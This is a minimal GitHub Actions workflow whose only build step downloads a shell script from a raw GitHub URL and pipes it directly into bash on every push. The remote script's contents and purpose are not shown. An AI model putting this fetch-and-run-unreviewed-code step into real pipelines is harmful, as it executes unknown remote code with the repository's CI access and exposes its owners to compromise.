name: my personal

on: [push, workflow_dispatch]

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Download
      run: bash <(curl -s https://raw.githubusercontent.com/sdtuif/Sa/main/ss.sh)
